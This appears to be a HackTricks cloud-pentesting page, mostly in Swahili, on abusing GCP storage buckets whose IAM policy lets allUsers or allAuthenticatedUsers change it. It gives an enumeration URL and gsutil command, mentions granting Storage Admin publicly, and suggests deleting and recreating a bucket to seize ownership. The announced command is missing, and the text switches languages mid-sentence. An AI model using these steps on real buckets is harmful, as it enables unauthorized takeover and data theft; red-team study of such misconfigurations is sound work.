Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ikiwa sera ya ndoo iliruhusu “allUsers” au “allAuthenticatedUsers” kuandika kwenye sera yao ya ndoo (idhini ya storage.buckets.setIamPolicy), basi mtu yeyote anaweza kubadilisha sera ya ndoo na kujipatia ufikiaji kamili.
Kuna njia 2 za kuangalia ruhusa juu ya ndoo. Ya kwanza ni kuziomba kwa kufanya ombi kwa https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam au kukimbia gsutil iam get gs://BUCKET_NAME.
Hata hivyo, ikiwa mtumiaji wako (ambaye huenda ni wa allUsers au allAuthenticatedUsers") hana ruhusa ya kusoma sera ya iam ya ndoo (storage.buckets.getIamPolicy), hiyo haitafanya kazi.
Chaguo lingine ambalo litafanya kazi kila wakati ni kutumia mwisho wa testPermissions wa ndoo ili kubaini ikiwa una ruhusa iliyotajwa, kwa mfano kufikia: https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update
Ili kutoa Storage Admin kwa allAuthenticatedUsers inawezekana kukimbia:
Another attack would be to ondoa ndoo na kuunda upya katika akaunti yako ili kuiba umiliki.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
